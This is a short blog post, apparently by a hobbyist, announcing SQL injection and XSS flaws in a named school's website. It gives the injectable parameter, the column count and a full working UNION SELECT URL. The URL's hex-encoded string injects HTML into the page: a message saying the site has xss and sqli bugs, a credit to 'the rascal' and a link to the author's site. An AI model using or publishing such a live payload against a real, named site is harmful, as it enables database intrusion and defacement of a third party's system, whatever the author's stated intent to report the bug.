[update]:
I have sent a mail to tvsmhss@tvslvs.com regarding this vulnerability and asked them to rectify it .
Hi t3ch viewers , i recently came across a bug at tvs lakshmi school website ...
It has xss and sqli bugs and all its major databases are visibile making it more vulnerable for hacking .
details :
site name: www.tvsmhss.org
bug :sqli
no of columns:7
visible text: 2 and 4
proof and demo:
to veiw proof and demo of the bug click the below link
http://www.tvsmhss.org/bulletinnews.php?id=-1%20union%20select%201,concat(0x52,0x65,0x63,0x65,0x6E,0x74,0x20,0x6E,0x65,0x77,0x73,0x20,0x66,0x72,0x6F,0x6D,0x20,0x74,0x68,0x65,0x20,0x73,0x63,0x68,0x6F,0x6F,0x6C,0x3A,0x0A,0x3C,0x68,0x31,0x3E,0x54,0x68,0x69,0x73,0x20,0x77,0x65,0x62,0x73,0x69,0x74,0x65,0x20,0x68,0x61,0x73,0x20,0x78,0x73,0x73,0x20,0x61,0x6E,0x64,0x20,0x73,0x71,0x6C,0x69,0x20,0x62,0x75,0x67,0x73,0x20,0x2E,0x2E,0x20,0x3A,0x28,0x20,0x2E,0x2E,0x0A,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2E,0x2E,0x3C,0x62,0x72,0x2F,0x3E,0x0A,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x63,0x6C,0x69,0x63,0x6B,0x20,0x68,0x65,0x72,0x65,0x20,0x74,0x6F,0x20,0x67,0x6F,0x20,0x74,0x6F,0x20,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E),3,4,5,6,7--
10:19 AM
Unknown
Posted in: 
0 comments:
Post a Comment